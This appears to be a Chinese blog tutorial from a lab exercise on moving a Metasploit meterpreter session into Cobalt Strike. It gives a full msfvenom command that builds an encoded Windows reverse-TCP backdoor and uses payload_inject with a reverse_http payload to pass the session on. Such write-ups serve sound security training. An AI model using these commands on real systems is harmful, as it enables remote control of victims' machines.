首页 > 其他分享 >CobaltStrike注入MSF会话

CobaltStrike注入MSF会话

时间:2022-11-17 19:45:58浏览次数:48  
标签:exe reverse windows CobaltStrike 会话 msf MSF meterpreter payload

声明:本文只是交流学习心得,如果被拿去做违法乱纪的事情,请自行负责,与作者无关

准备工作

kali机开启CS服务器

Win10开启msf、CS客户端

Win7充当一台靶机

 

 

第一步:利用msfvenom生成后门,并且上传到靶机让其执行,获得meterpreter

生成后门(路径就是当前路径了,就在桌面)

命令:msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=172.21.125.215 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10 -f exe -o payload.exe

 

 然后把payload.exe上传到win7里面(可以用python开一个服务传递,命令 python -m http.server 端口号,我这里直接上传了)

 利用msf得到meterpreter

 开启监听

 靶机运行payload.exe,即得到meterpreter

 

第二步:设置msf,达到与CobaltStrike连接

先让meterpreter进入后台模式

 然后加载msf的payload注入功能 (use exploit/windows/local/payload_inject),并且设置payload(set payload windows/meterpreter/reverse_http),注意这里末尾是reverse_http

 然后设置参数

 run

 然后设置CS客户端

 

 

 

 如果没有上线,可以在msf中多run几次

 

 

 

 

标签:exe,reverse,windows,CobaltStrike,会话,msf,MSF,meterpreter,payload
From: https://www.cnblogs.com/dzhcjy/p/16900236.html

相关文章

  • CobaltStrike之信息收集
    声明:本文只是交流学习心得,如果被拿去做违法乱纪的事情,请自行负责,与作者无关CobalitStrike简称CS,是一个渗透测试的利器,它可以被分为一个服务端和多个客户端,所以可以被用来......
  • tensorflow1.x——如何在C++多线程中调用同一个session会话tensorflow1.x
     =================================================  从前文​​tensorflow1.x——如何在python多线程中调用同一个session会话​​可以知道,使用python多线程调用同一......
  • tensorflow1.x——如何在python多线程中调用同一个session会话
    如何在python多线程中调用同一个session会话? 这个问题源于我在看的一个强化学习代码:​​https://gitee.com/devilmaycry812839668/scalable_agent​​ 在众多的机器学习的......
  • oracle 会话查询
    需要管理员用户下执行(sys/sysdba)--先查锁select*fromv$lockwherelmode>0andtypein('TM','TX');--查用户名select*fromv$sessionwhereusername='P......
  • 批量创建xshell会话
    importreimportostmp_file=r"C:\Users\yc\Documents\NetSarangComputer\7\Xshell\Sessions\192.168.2.253.xsh"withopen(tmp_file,"r+",encoding="utf-16......
  • 会话保持 Session和cookie
      Session是什么?      Session在网络中称为会话控制,是服务器为了保护用户状态而创建的一个特殊的对象,简而言之,session就是一个对象,用于存储信息。 Sess......
  • MSF内网信息收集(1)
    1.msf通过shell关闭防火墙Netshadvfirewallsetallprofilesstateoff(关闭防火墙)Netshadvfirewallshowallprofiles(查看防火墙状况)通过策略添加防火墙规则规避行......
  • day16 --> (会话技术(Cookie、Session)、JSP入门)
    今日内容:1、会话技术:1.Cookie2.Sessio2、JSP入门学习 会话技术1、会话:一次会话中包含多次请求和响应。一次会话:浏览器第一次给服务器资源发送请求,会话建立,知道有一......
  • CS与MSF联动
    0x01CS与MSFCobaltStrike(简称CS)是一款美国RedTeam开发的渗透测试神器。Armitage是一个MetasploitFramework(简称MSF)的图形化界面工具,而Cobaltstrike大家可以理解其为Armi......
  • MSF内网信息收集
    一、msf需要生成一个paylaod,window下面生成一个exesudo./msfvenom-pwindows/x64/meterpreter/reverse_tcpLHOST=172.20.10.10LPORT=3333-fexe-oshell.exe......